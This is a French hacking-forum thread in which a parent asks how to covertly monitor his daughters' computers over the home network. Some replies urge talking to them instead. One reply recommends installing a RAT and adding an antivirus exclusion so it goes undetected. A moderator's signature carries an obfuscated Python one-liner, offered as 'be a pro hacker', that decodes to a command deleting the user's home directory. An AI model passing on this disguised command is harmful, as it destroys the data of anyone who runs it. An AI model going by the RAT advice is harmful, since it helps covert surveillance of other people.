Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-03-2013 13:03:15

homayon500
N00b

Savoir ce qui se fit sur un autre ordinateur en réseau local

Bonjour

mes deux filles viennent d'avoir chacune un ordinateur et elles se connectent en wifi . Hors je voudrais parfois vérifier à partir de l'ordinateur central(qui est relié à resau local) ce qu'elles y font sans avoir à monter dans leur chambre ou à regarder les historiques qu'elles savent certainement faire disparaître.

j'ai leur ip aussi ,je voulais savoir si on pourrais faire ca à partie de backtrack ?

Merci d'avance

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-03-2013 13:29:19

Furyo
Membre Irremplaçable
Site Web

Re : Savoir ce qui se fit sur un autre ordinateur en réseau local

Pourquoi ne pas utliser un logiciel directement sous windaube qui gère le contrôle parental ?? Sur 01.net, il ya tout ce que tu veux...

Ou alors installer un teamviewver sur chaque machine...

Maintenant, je pense que les responsabiliser serait d'autant plus educatif et surtout en parler en definissant des plages horaires pour l'utilisation du reseau? Non??

J'aime pas ce genre de questions.... Car qu'est qui nous prouves que tu es bien sur ton reseau local ?

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 02-03-2013 13:48:04

comaX
Nouveau membre

C'est triste de penser avoir besoin d'espionner tes filles. Je comprends bien que c'est pour leur protection, mais c'est comme tout, il faut faire ses propres expériences, ses propres erreurs sans que les parents le sache.
Par ailleurs, ton orthographe me laisse dubitatif quant à ta qualité de parent, mais admettons.

Maintenant, ce préambule fait, et comme le dit furyo, pas besoin de Backtrack ici. Un simple RAT suffit. Bien sur il est détecté comme virus par l'AV, mais il suffit de créer une règle d'exclusion. Après tout, de base, un RAT est un outil d'administration à distance...

#4 02-03-2013 15:29:14

M1ck3y
Administrateur
Lieu : Lost in the darkness

plus_un

Plutot que de perdre du temps à les espionner, ce qui signifie par la meme occasion empiéter sur leur intimité et leur jardin secret, il serait intéressant de passer quelques heures à leur expliquer le fonctionnement d'un navigateur web, en leur démontrant que lorsqu'on utilise tel ou tel service de chat online n'importe qui peut se faire passer pour n'importe qui, que le fait de recevoir un mail intitulé "attention service paypal" ne signifie pas pour autant qu'il faut s'empresser de cliquer sur le lien contenu à l'intérieur... Bref toutes ces petites choses qui font la distinction entre un internaute averti et une proie pour les escrocs et autres prédateurs du net. C'est ça le role d'un parent responsable, et pas d'aller faire du flicage. Enfin ce n'est que mon point de vue.

#5 03-03-2013 19:34:36

spawn
Modérateur

Un parent ayant des problèmes de dialogue avec ses filles pourrait utiliser wireshark et filtrer les requêtes dns (noms de sites web).
Cela dit, je n'ai que 20 ans.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce